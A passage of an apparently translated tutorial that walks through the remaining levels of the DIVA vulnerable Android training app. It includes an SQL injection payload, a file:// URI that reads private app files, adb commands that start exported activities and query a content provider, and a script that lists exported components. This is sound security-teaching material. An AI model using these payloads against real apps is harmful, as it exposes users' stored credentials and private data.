Continuing from the unfinished article "Android App vulnerability learning (I)", this post covers the remaining sections.
Part 7 Insecure input 1 (SQLi)
Open the log:
adb logcat
Enter a single quotation mark in the search field. A SQLite syntax error shows up in the log, which means the input is concatenated straight into the query: SQL injection.
Enter ' or '1'='1 and the query matches every row, returning all users' passwords.
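The query behaviour above, as an added example that is not DIVA's own code: the string-concatenated lookup is simulated with Python's sqlite3 next to a parameterized version, so the single-quote probe, the ' or '1'='1 payload and the fix can be run offline. The table name sqliuser, its columns and the three rows are constructed for this demo; DIVA's real schema may differ.

```python
"""Added example: simulate DIVA-style SQL injection and its fix in sqlite3."""
import sqlite3


def make_db():
    """In-memory SQLite DB with a constructed sqliuser table (not DIVA's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sqliuser(user TEXT, password TEXT, credit_card TEXT)")
    conn.executemany(
        "INSERT INTO sqliuser VALUES (?, ?, ?)",
        [
            ("alice", "pa55", "4111000011110001"),  # constructed sample rows
            ("bob", "hunter2", "4222000022220002"),
            ("carol", "letmein", "4333000033330003"),
        ],
    )
    return conn


def vulnerable_lookup(conn, user):
    """The vulnerable pattern: user input spliced into the SQL string."""
    sql = "SELECT user, password, credit_card FROM sqliuser WHERE user = '" + user + "'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, user):
    """Hardened form: a bound parameter can never change the query's shape."""
    return conn.execute(
        "SELECT user, password, credit_card FROM sqliuser WHERE user = ?", (user,)
    ).fetchall()


def probe_single_quote(conn):
    """The single-quote probe; the syntax error is what shows up in logcat."""
    try:
        vulnerable_lookup(conn, "'")
        return None
    except sqlite3.OperationalError as err:
        return str(err)


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print("probe error :", probe_single_quote(db))
    print("vulnerable  :", vulnerable_lookup(db, payload))  # every row
    print("parameterized:", safe_lookup(db, payload))       # no rows
```

With the payload the vulnerable query becomes `WHERE user = '' or '1'='1'`, which is true for every row; the parameterized query looks for a user literally named `' or '1'='1` and returns nothing.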
Part 8 Insecure input 2 (read local file)
The input field takes an arbitrary URL, so a file:// URI pointing at the app's own private data works too and any file the app can read is exposed. Enter:
file:///data/data/jakhar.aseem.diva/shared_prefs/jakhar.aseem.diva_preferences.xml
Part 9 access control 1 (activity 1)
Look at the activity components exported in AndroidManifest.xml (android:exported="true", or an intent-filter without android:exported="false"):
Use am (the activity manager tool) to start the exported component directly, bypassing the app's own access control:
adb shell am start jakhar.aseem.diva/.APICredsActivity
adb shell am start -n jakhar.aseem.diva/.APICredsActivity -a jakhar.aseem.diva.action.VIEW_CREDS
You can also do this with drozer:
Part 10 access control 2 (activity 2)
Run adb shell am start -n jakhar.aseem.diva/.APICreds2Activity. The trick from Part 9 no longer works on its own: this activity adds a PIN check before it shows the credentials.
Part 11 access control 3 (content providers)
To find exported content provider components, check the provider entries in AndroidManifest.xml:
Then grep the decompiled smali for the content:// URIs the app uses:
$ grep -lr "content://" *
Query the private notes through the exposed provider:
$ adb shell content query --uri content://jakhar.aseem.diva.provider.notesprovider/notes
Another way is to use drozer:
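Parts 9 and 11 both start from the same question: which components does the manifest expose? The script below is an added example (not DIVA's own code, and not drozer) that reads a decoded AndroidManifest.xml, such as the one apktool produces, applies the export rules and prints the adb commands to poke each exported activity, service, receiver or provider. SAMPLE_MANIFEST is constructed for the demo: only the package name, APICredsActivity with its VIEW_CREDS action and the notesprovider authority come from this post, the other entries are assumed.

```python
"""Added example: list exported Android components from a decoded manifest."""
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENTS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample; it only loosely mirrors DIVA's real manifest.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="jakhar.aseem.diva">
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".APICredsActivity">
      <intent-filter>
        <action android:name="jakhar.aseem.diva.action.VIEW_CREDS"/>
        <category android:name="android.intent.category.DEFAULT"/>
      </intent-filter>
    </activity>
    <activity android:name=".HiddenActivity" android:exported="false"/>
    <activity android:name=".AdminActivity" android:exported="true"
        android:permission="jakhar.aseem.diva.ADMIN"/>
    <provider android:name=".NotesProvider"
        android:authorities="jakhar.aseem.diva.provider.notesprovider"
        android:exported="true"/>
    <provider android:name=".PrivateProvider"
        android:authorities="jakhar.aseem.diva.provider.private"/>
  </application>
</manifest>
"""


def _attr(elem, name):
    """Read an android:-namespaced attribute."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def _component(pkg, name):
    """Render a class name in the pkg/.Class form that am(1) accepts."""
    full = pkg + name if name.startswith(".") else name
    if full.startswith(pkg + "."):
        return "%s/%s" % (pkg, full[len(pkg):])
    return "%s/%s" % (pkg, full)


def exported_components(manifest_xml):
    """Components other apps can reach.

    Rule assumed here (targetSdk 17..30): an explicit android:exported wins;
    otherwise activities, services and receivers are exported iff they declare
    an intent-filter, and providers are private unless exported="true".
    A non-empty 'permission' means the caller must hold that permission.
    """
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package")
    found = []
    for elem in root.find("application"):
        if elem.tag not in COMPONENTS:
            continue
        exported = _attr(elem, "exported")
        if exported is not None:
            is_exported = exported.lower() == "true"
        elif elem.tag == "provider":
            is_exported = False
        else:
            is_exported = elem.find("intent-filter") is not None
        if not is_exported:
            continue
        found.append({
            "kind": elem.tag,
            "component": _component(pkg, _attr(elem, "name")),
            "permission": _attr(elem, "permission"),
            "actions": [_attr(a, "name") for a in elem.iter("action")],
            "authorities": (_attr(elem, "authorities") or "").split(";"),
        })
    return found


def poke_commands(comp):
    """adb one-liners to exercise one exported component."""
    if comp["kind"] == "provider":
        return ["adb shell content query --uri content://%s/<path>" % a
                for a in comp["authorities"] if a]
    verb = {"activity": "start", "activity-alias": "start",
            "service": "startservice", "receiver": "broadcast"}[comp["kind"]]
    cmds = ["adb shell am %s -n %s" % (verb, comp["component"])]
    for action in comp["actions"]:
        if action != "android.intent.action.MAIN":  # launcher entry is not interesting
            cmds.append("adb shell am %s -n %s -a %s" % (verb, comp["component"], action))
    return cmds


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_MANIFEST
    for comp in exported_components(text):
        guard = " (needs %s)" % comp["permission"] if comp["permission"] else ""
        print("%s %s%s" % (comp["kind"], comp["component"], guard))
        for cmd in poke_commands(comp):
            print("   ", cmd)
```

Run it as `python3 find_exported.py AndroidManifest.xml` (hypothetical file name) against the apktool output; with no argument it uses the constructed sample. Components that carry an android:permission are still listed, because the permission may be grantable or weakly protected, but they are marked so you know the plain am start will be refused. The `<path>` placeholder in the provider command has to be filled from the content:// URIs the grep step turns up, since the manifest only names the authority.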
Summary
This post briefly covers the remaining sections. If you run into questions while working through them, raise them and we can discuss. To make that easier, join the study group, ask the author freely and learn together.